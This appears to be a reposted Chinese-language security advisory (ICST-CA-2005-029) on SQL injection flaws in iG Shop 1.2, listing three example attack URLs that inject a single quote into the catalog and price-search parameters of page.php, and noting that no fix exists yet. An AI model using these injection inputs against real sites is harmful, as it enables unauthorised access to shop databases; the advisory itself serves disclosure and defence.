jenhaoliu
|
分享:
x0
|
[漏洞修补] iG Shop Input Validation Bugs Let Remote Users Execute SQL
漏洞名称: iG Shop Input Validation Bugs Let Remote Users Execute SQL Commands 漏洞编号: ICST-CA-2005-029 漏洞说明: iG Shop中存在漏洞,远端使用者可以藉此注入SQL指令 底下列出一些URL入侵范例 http://[target]/page.php?page_type=catalog_product s&type_id[]=2 &SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats=' http://[target]/page.php?page_type=catalog_products&type_id[]=2 &SESSION _ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search =1&l_price='&u_price=1&Submit=Search
http://[target]/page.php?page_type=catalog_products&type_ id[]=2 &SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search =1&l_price=1&u_price='&Submit=Search
影响平台: iG Shop 1.2版 影响状况: 远端使用者可以对资料库系统下任意SQL指令 解决方案: 目前尚无确切解决方案 参考资料: iG Shop Input Validation Bugs Let Remote Users Execute SQL Commands
|